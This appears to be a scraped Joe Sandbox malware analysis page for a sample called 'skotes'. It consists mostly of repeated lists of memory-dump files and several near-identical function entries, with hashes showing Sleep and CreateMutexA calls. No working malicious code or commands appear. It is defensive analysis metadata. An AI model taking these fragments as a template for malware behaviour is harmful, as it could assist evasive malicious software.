Associated: 00000002.00000002.1874221065.0000000000A7C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874238807.0000000000A81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874255412.0000000000A88000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874271980.0000000000A8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874289352.0000000000A93000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874305792.0000000000A95000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874326138.0000000000AA5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874343234.0000000000AA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874343234.0000000000AD4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874393364.0000000000B00000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874411678.0000000000B01000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874427915.0000000000B02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874445809.0000000000B09000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874463427.0000000000B17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874479484.0000000000B19000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7f0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 40379930bc77892ee54c39fa5613fffd21abab37d8c1018527c9d37dcc518da2
Instruction ID: 49fbe94db6d9f58cf67a2fe9f31926eb16bb86ebd7537d540bfa301709112e89
Opcode Fuzzy Hash: 40379930bc77892ee54c39fa5613fffd21abab37d8c1018527c9d37dcc518da2
Instruction Fuzzy Hash: 7F3126B16002089BEB18DBBCDC89B7DB762EBD1311F204218E258DB3D6D77D99808762

Function 007F9F44 Relevance: 3.1, APIs: 2, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 007FA963
CreateMutexA.KERNELBASE(00000000,00000000,00853254), ref: 007FA981

Memory Dump Source

Source File: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 007F0000, based on PE: true

Associated: 00000002.00000002.1873400634.00000000007F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873417198.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873483948.0000000000859000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873505010.000000000085B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873525420.0000000000867000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873639358.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873657038.00000000009CC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873678925.00000000009DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873678925.00000000009E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873719330.00000000009EA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873738206.00000000009EB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873757897.00000000009EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873777719.00000000009EF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873795366.00000000009F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873811521.00000000009F1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873832926.00000000009FC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873855205.0000000000A01000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873872768.0000000000A02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873889895.0000000000A03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873914727.0000000000A19000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873933730.0000000000A1A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873951041.0000000000A1B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873967479.0000000000A1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873988739.0000000000A24000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874010902.0000000000A2E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874036027.0000000000A54000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874052498.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874068703.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874088061.0000000000A5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874108218.0000000000A5D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874126370.0000000000A64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874142727.0000000000A65000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874159841.0000000000A6A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874177423.0000000000A71000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874202708.0000000000A74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874221065.0000000000A7C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874238807.0000000000A81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874255412.0000000000A88000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874271980.0000000000A8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874289352.0000000000A93000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874305792.0000000000A95000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874326138.0000000000AA5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874343234.0000000000AA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874343234.0000000000AD4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874393364.0000000000B00000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874411678.0000000000B01000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874427915.0000000000B02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874445809.0000000000B09000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874463427.0000000000B17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874479484.0000000000B19000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7f0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 0c729de554af8ec5cb180a915ae80e9316919fdf9de5e142bb25188a9016a0cb
Instruction ID: e75cd5734e913aa21ec39be2a9b3b08078b343ba83e24ce794e36d2ba04fef0c
Opcode Fuzzy Hash: 0c729de554af8ec5cb180a915ae80e9316919fdf9de5e142bb25188a9016a0cb
Instruction Fuzzy Hash: 73314871600208ABEB18DB78DC857BDB7A2EBC5310F204619E258DB3D6E77E99808752

Function 007FA079 Relevance: 3.1, APIs: 2, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 007FA963
CreateMutexA.KERNELBASE(00000000,00000000,00853254), ref: 007FA981

Memory Dump Source

Source File: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 007F0000, based on PE: true

Associated: 00000002.00000002.1873400634.00000000007F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873417198.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873483948.0000000000859000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873505010.000000000085B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873525420.0000000000867000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873639358.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873657038.00000000009CC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873678925.00000000009DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873678925.00000000009E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873719330.00000000009EA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873738206.00000000009EB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873757897.00000000009EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873777719.00000000009EF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873795366.00000000009F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873811521.00000000009F1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873832926.00000000009FC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873855205.0000000000A01000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873872768.0000000000A02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873889895.0000000000A03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873914727.0000000000A19000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873933730.0000000000A1A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873951041.0000000000A1B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873967479.0000000000A1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873988739.0000000000A24000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874010902.0000000000A2E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874036027.0000000000A54000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874052498.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874068703.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874088061.0000000000A5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874108218.0000000000A5D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874126370.0000000000A64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874142727.0000000000A65000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874159841.0000000000A6A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874177423.0000000000A71000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874202708.0000000000A74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874221065.0000000000A7C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874238807.0000000000A81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874255412.0000000000A88000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874271980.0000000000A8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874289352.0000000000A93000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874305792.0000000000A95000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874326138.0000000000AA5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874343234.0000000000AA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874343234.0000000000AD4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874393364.0000000000B00000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874411678.0000000000B01000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874427915.0000000000B02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874445809.0000000000B09000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874463427.0000000000B17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874479484.0000000000B19000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7f0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: ae07aab42b507ac7297daa9fd5dd2a5f84b008558d9fda9634cd568e9a3e15f8
Instruction ID: 9b60313b562936938d7f66fc01f6119d799ab79a07b1ff024bd2d757b078cea9
Opcode Fuzzy Hash: ae07aab42b507ac7297daa9fd5dd2a5f84b008558d9fda9634cd568e9a3e15f8
Instruction Fuzzy Hash: 0E3128B1A00208ABEB18DB7CDC85B7DB772EB95314F204218E218D73D6E77E69808753

Function 007FA1AE Relevance: 3.1, APIs: 2, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 007FA963
CreateMutexA.KERNELBASE(00000000,00000000,00853254), ref: 007FA981

Memory Dump Source

Source File: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 007F0000, based on PE: true

Associated: 00000002.00000002.1873400634.00000000007F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873417198.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873483948.0000000000859000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873505010.000000000085B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873525420.0000000000867000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873639358.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873657038.00000000009CC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873678925.00000000009DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873678925.00000000009E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873719330.00000000009EA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873738206.00000000009EB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873757897.00000000009EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873777719.00000000009EF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873795366.00000000009F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873811521.00000000009F1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873832926.00000000009FC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873855205.0000000000A01000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873872768.0000000000A02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873889895.0000000000A03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873914727.0000000000A19000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873933730.0000000000A1A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873951041.0000000000A1B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873967479.0000000000A1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873988739.0000000000A24000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874010902.0000000000A2E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874036027.0000000000A54000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874052498.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874068703.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874088061.0000000000A5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874108218.0000000000A5D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874126370.0000000000A64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874142727.0000000000A65000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874159841.0000000000A6A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874177423.0000000000A71000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874202708.0000000000A74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874221065.0000000000A7C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874238807.0000000000A81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874255412.0000000000A88000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874271980.0000000000A8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874289352.0000000000A93000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874305792.0000000000A95000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874326138.0000000000AA5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874343234.0000000000AA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874343234.0000000000AD4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874393364.0000000000B00000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874411678.0000000000B01000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874427915.0000000000B02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874445809.0000000000B09000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874463427.0000000000B17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874479484.0000000000B19000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7f0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 60f7051c2aa671aae0fe3da9ebe937005e1f78c19af63449bfbe58dbf8ef5e9d
Instruction ID: e387427a46134f2bb2f29a820d8fddc703798d9d9f05fd6a30035293b4e24165
Opcode Fuzzy Hash: 60f7051c2aa671aae0fe3da9ebe937005e1f78c19af63449bfbe58dbf8ef5e9d
Instruction Fuzzy Hash: 0E3115B1B00208ABEB18DBA8DC89B7DB776FBD5310F204218E218D73D2D77E59808752

Function 007FA418 Relevance: 3.1, APIs: 2, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 007FA963
CreateMutexA.KERNELBASE(00000000,00000000,00853254), ref: 007FA981

Memory Dump Source

Source File: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 007F0000, based on PE: true

Associated: 00000002.00000002.1873400634.00000000007F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873417198.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873483948.0000000000859000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873505010.000000000085B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873525420.0000000000867000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873639358.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873657038.00000000009CC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873678925.00000000009DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873678925.00000000009E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873719330.00000000009EA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873738206.00000000009EB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873757897.00000000009EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873777719.00000000009EF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873795366.00000000009F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873811521.00000000009F1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873832926.00000000009FC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873855205.0000000000A01000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873872768.0000000000A02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873889895.0000000000A03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873914727.0000000000A19000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873933730.0000000000A1A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873951041.0000000000A1B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873967479.0000000000A1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873988739.0000000000A24000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874010902.0000000000A2E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874036027.0000000000A54000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874052498.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874068703.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874088061.0000000000A5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874108218.0000000000A5D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874126370.0000000000A64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874142727.0000000000A65000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874159841.0000000000A6A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874177423.0000000000A71000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874202708.0000000000A74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874221065.0000000000A7C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874238807.0000000000A81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874255412.0000000000A88000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874271980.0000000000A8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874289352.0000000000A93000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874305792.0000000000A95000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874326138.0000000000AA5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874343234.0000000000AA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874343234.0000000000AD4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874393364.0000000000B00000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874411678.0000000000B01000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874427915.0000000000B02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874445809.0000000000B09000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874463427.0000000000B17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874479484.0000000000B19000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7f0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: ff768b6f548a31bd6473b187f303813ea182a4e75f890572a4e529889c241424
Instruction ID: e8b57ab896d79f99cb6caed839b9d6227719a1d3792a385253ca9d757492cd30
Opcode Fuzzy Hash: ff768b6f548a31bd6473b187f303813ea182a4e75f890572a4e529889c241424
Instruction Fuzzy Hash: 0F311BB1A00244ABEB18DBBCDC8977DB662EBD1314F204218E258D73D6E7BD59C08653

Function 007FA54D Relevance: 3.1, APIs: 2, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 007FA963
CreateMutexA.KERNELBASE(00000000,00000000,00853254), ref: 007FA981

Memory Dump Source

Source File: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 007F0000, based on PE: true

Associated: 00000002.00000002.1873400634.00000000007F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873417198.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873483948.0000000000859000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873505010.000000000085B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873525420.0000000000867000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873639358.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873657038.00000000009CC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873678925.00000000009DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873678925.00000000009E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873719330.00000000009EA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873738206.00000000009EB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873757897.00000000009EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873777719.00000000009EF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873795366.00000000009F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873811521.00000000009F1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873832926.00000000009FC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873855205.0000000000A01000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873872768.0000000000A02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873889895.0000000000A03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873914727.0000000000A19000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873933730.0000000000A1A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873951041.0000000000A1B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873967479.0000000000A1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873988739.0000000000A24000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874010902.0000000000A2E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874036027.0000000000A54000.00000080.00000001.01000000.00000007.sdmpDownload File
